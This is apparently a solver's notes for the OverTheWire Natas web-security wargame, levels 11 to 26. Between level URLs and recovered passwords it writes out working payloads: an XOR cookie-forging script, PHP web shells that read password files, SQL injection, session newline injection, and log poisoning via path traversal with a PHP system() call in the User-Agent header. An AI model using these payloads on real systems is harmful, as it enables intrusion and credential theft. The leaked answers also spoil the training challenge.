
```
<?
function xor_encrypt($in) {
    $key = 'qw8J';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}


function xor_encrypt2($in1, $in2) {
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($in1);$i++) {
    $outText .= $in1[$i] ^ $in2[$i];
    }

    return $outText;
}
$var1 = "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEl0vFBJdaAw=";
$var2 = "{\"showpassword\":\"no\",\"bgcolor\":\"#eeeeee\"}";
$var3 = "{\"showpassword\":\"yes\",\"bgcolor\":\"#eeeeee\"}"
echo xor_encrypt2(base64_decode($var1), $var2);
echo "\n\n"
echo base64_encode(xor_encrypt($var3));
?>
```

http://natas12.natas.labs.overthewire.org/
EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

<?echo passthru("cat /etc/natas_webpass/natas13")?>

http://natas13.natas.labs.overthewire.org/
jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

<?echo passthru("cat /etc/natas_webpass/natas14")?>

http://natas14.natas.labs.overthewire.org/
Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

id : 1
pw : "or"1"="1

http://natas15.natas.labs.overthewire.org/
AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

http://natas16.natas.labs.overthewire.org/
WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

http://natas17.natas.labs.overthewire.org/
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

http://natas18.natas.labs.overthewire.org/
xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP
610

http://natas19.natas.labs.overthewire.org/
4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
595

http://natas20.natas.labs.overthewire.org/
eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF

http://natas20.natas.labs.overthewire.org/index.php?name=asdf%0aadmin%201

http://natas21.natas.labs.overthewire.org/
IFekPyrQXftziDEsUr3x21sYuahypdgJ

http://natas21-experimenter.natas.labs.overthewire.org/index.php?align=right&fontsize=100%25&bgcolor=yellow&submit=Update&debug=1&admin=1

http://natas22.natas.labs.overthewire.org/
chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ

GET /?revelio=1 HTTP/1.1
Host: natas22.natas.labs.overthewire.org
Authorization: Basic bmF0YXMyMjpjaEc5ZmJlMVRxMmVXVk1nallZRDFNc2ZJdk40NjFrSg==

http://natas23.natas.labs.overthewire.org/
D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE

http://natas23.natas.labs.overthewire.org/?passwd=111111111iloveyou

http://natas24.natas.labs.overthewire.org/
OsRmXFguozKpTZZ5X14zNO43379LZveg

insert : OsRmXFguozKpTZZ5X14zNO43379LZveg


http://natas25.natas.labs.overthewire.org/
GHF6X7YwACaYYssHVY05cFq83hRktl4c


GET /?lang=../..././..././..././..././..././..././tmp/natas25_1234.log HTTP/1.1
Host: natas25.natas.labs.overthewire.org
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Authorization: Basic bmF0YXMyNTpHSEY2WDdZd0FDYVlZc3NIVlkwNWNGcTgzaFJrdGw0Yw==
Upgrade-Insecure-Requests: 1
User-Agent: <? echo system("cat /etc/natas_webpass/natas26") ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: __cfduid=d4c3959c378d39f34654ad6636fbffc611480700237; __utma=176859643.2027556906.1480700237.1480700237.1480700237.1; __utmz=176859643.1480700237.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1234


http://natas26.natas.labs.overthewire.org/
oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
